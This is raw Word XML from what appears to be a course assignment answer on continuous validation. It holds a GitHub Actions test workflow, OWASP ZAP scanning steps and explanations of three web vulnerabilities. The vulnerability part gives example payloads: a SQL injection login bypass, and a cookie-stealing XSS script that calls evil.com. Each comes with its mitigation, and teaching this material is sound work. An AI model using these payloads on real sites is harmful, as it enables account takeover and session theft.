          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  Continuous Validation Automation using CI Pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEB6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Validation Automation using GitHub </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actions  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEB7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 1: Role of CI Pipelines in Continuous </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Validation  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2 Marks]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354F" w14:paraId="4BAECE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AECEB8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>Continuous Integration (CI) pipelines ensure that every code commit triggers an automated sequence of build, test, and validation steps — providing immediate feedback and preventing defects f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>rom propagating into production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECEBA" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECEBB" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Key Roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEBC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Automated Test Execution: Unit, integration, and security tests run automatically on every push/PR, ensuring no manual step is skipped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEBD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Immediate Feedback Loop: Developers receive pass/fail status within minutes of committing code, reducing defect cost and rework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEBE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Validation Evidence Collection: CI pipelines generate test logs, coverage reports, and scan results as artifacts — forming audi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>table evidence trails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEBF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Consistent Environment: Tests execute in clean, reproducible containers, eliminating 'works on my machine' inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEC0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Gate Enforcement: Pipelines can block merges if validation thresholds (e.g. coverage &lt; 80%) are not met, enfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>rcing quality standards programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEC1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECEC2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 2: GitHub Actions </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Workflow  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3 Marks]</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4BAECEC3" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The following YAML workflow installs dependencies, executes tests, generates validation logs, and uploads validation artifacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECEC4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="005235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354F" w14:paraId="4BAECF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2" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E2D3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AECEC5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validation.yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4BAECEC6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name: Security Validation and Test Pipeline</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEC7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECEC8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on:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEC9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push:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECECA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branches: [ main,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develop ]</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4BAECECB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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECECC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branches: [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main ]</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4BAECECD" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECECE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jobs:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECECF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validate:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED0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name: Run Validation Suite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED1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runs-on: ubuntu-latest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECED3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steps:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED4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# Step 1: Checkout source code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED5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- name: Checkout Repository</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED6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uses: actions/checkout@v4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECED8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# Step 2: Set up Node.js runtime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECED9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- name: Setup Node.js</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEDA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uses: actions/setup-node@v4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEDB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with:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEDC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node-version: '20'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEDD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cache: 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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEDE" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECEDF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# Step 3: I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nstall dependencies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE0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- name: Install Dependencies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE1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ci</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECEE3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# Step 4: Run unit and integration tests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE4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- name: Execute Test Suite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE5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run: |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE6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run test -- --coverage \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE7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--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coverageReporters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=text \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE8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--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coverageReporters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lcov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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEE9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--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testResultsProcessor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=jest-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junit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4BAECEEA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env:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEEB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CI: true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEEC" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECEED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# Step 5: Generate validation log with metadata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEEE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- name: Generate Validation Log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEEF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run: |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF0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-p validation-e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vidence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF1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echo '=== VALIDATION LOG ===' &gt; validation-evidence/validation.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF2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echo "Timestamp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$(date -u)"   &gt;&gt; validation-evidence/validation.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF3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echo "Commit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SHA  :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$GITHUB_SHA"  &gt;&gt; validation-evidence/validation.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF4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echo "Branch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$GITHUB_REF"  &gt;&gt; validation-evidence/validation.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF5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echo "Runner OS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$RUNNER_OS"   &gt;&gt; validation-evidence/validation.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF6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echo '' &gt;&gt; validation-evidence/validation.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF7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cat coverage/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lcov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-report/index.ht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ml &gt;&gt; validation-evidence/validation.log || true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF8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cp test-results.xml validation-evidence/ 2&gt;/dev/null || true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEF9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECEFA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# Step 6: Run OWASP Dependency Check</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEFB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- name: OWASP Dependency Audit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEFC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run: |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEFD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audit --audit-level=moderate &gt; validation-evidence/npm-audit.log || true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECEFE" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECEFF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# Step 7: Upload all validation artifacts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF00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- name: Upload Validation Artifacts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF01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uses: actions/upload-artifact@v4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF02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if: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always(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4BAECF03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with:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF04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name: validation-evidence-$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github.run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}}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF05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path: |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF06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validation-evidence/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF07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coverage/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF08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retention-days: 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF09" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAECF0A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# Step 8: Publish test results as PR comment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF0B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- name: Publish Test Results</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF0C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uses: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dorny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/test-reporter@v1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF0D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if: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always(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4BAECF0E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with:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF0F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name: Validation Test Report</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF10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path: 'test-results.xml'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF11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reporter: jest-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junit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECF13" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354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354F" w14:paraId="4BAEC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AECF14" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t xml:space="preserve">The `if: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>always(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>)` condition on upload steps ensures artifacts are preserved even when tests fail — critical for post-failure forensic analysis and audit evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECF16" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF17" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF18" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SECTION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>C  –</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  Security Validation and Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF19" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3. Structural Vulnerability Examination using OWASP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ZAP  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF1A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 1: Importance of Security-Oriented </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Validation  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1 Mark]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF1B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Security-oriented validation ensures that a software system is not only functionally correct but also resistant to malicious ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ploitation. Without security validation, applications are exposed to data breaches, unauthorized access, financial loss, and regulatory non-compliance. It verifies that security controls (authentication, authorization, encryption, input validation) functio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>n as intended under adversarial conditions. For systems handling sensitive data — student records, financial transactions, health information — security validation is a non-negotiable requirement before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF1C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF1D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 2: Three Vulnerability </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Explanations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF1E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1. SQL Injection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF1F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>SQL Injection occurs when an attacker inserts malicious SQL code into an input field that is directly concatenated into a database query. For example, entering ' OR '1'='1 into a login form can bypass authentication entirely. The root cause is lack of para</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>meterized queries or prepared statements. Impact ranges from unauthorized data access to complete database deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF20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Example payload: admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF21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Mitigation: Use parameterized queries, ORM frameworks, and input sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF22" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF23" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF24" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>XS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">S attacks inject malicious client-side scripts (usually JavaScript) into web pages viewed by other users. Reflected XSS executes immediately from a crafted URL; Stored XSS persists in the database and executes whenever the page loads. Attackers use XSS to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>steal session cookies, redirect users, or perform actions on their behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF25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Example payload: &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>='http://evil.com?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF26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Mitigation: Output encoding, Content Security Policy (CSP) headers, input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF27" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF28" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3. Br</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>oken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF29" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Broken Authentication occurs when authentication and session management mechanisms are improperly implemented, allowing attackers to compromise passwords, keys, or session tokens. Common manifestations include weak password policies, mi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ssing account lockout, session tokens exposed in URLs, and sessions that never expire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF2A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Example: Application accepts admin/admin credentials or does not invalidate sessions after logout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF2B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Mitigation: Enforce MFA, strong password policies, secure session mana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>gement, and proper logout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF2C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF2D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3: OWASP ZAP Vulnerability Assessment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Workflow  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF2E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 1 — Target Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF2F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Launch OWASP ZAP and navigate to: Quick Start &gt; Automated Scan or Manual Explore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF30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Enter the target URL (e.g., http://demo.testfire.net or localhost:8080) in the 'URL to attack' field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF31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Configure browser proxy: set browser proxy to 127.0.0.1:8080 (ZAP's default interception port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF32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Set authentication context if the application requires log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>in (Tools &gt; Session Management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF33" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF34" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2 — Passive Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF35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Enable the Passive Scanner (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Analyse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
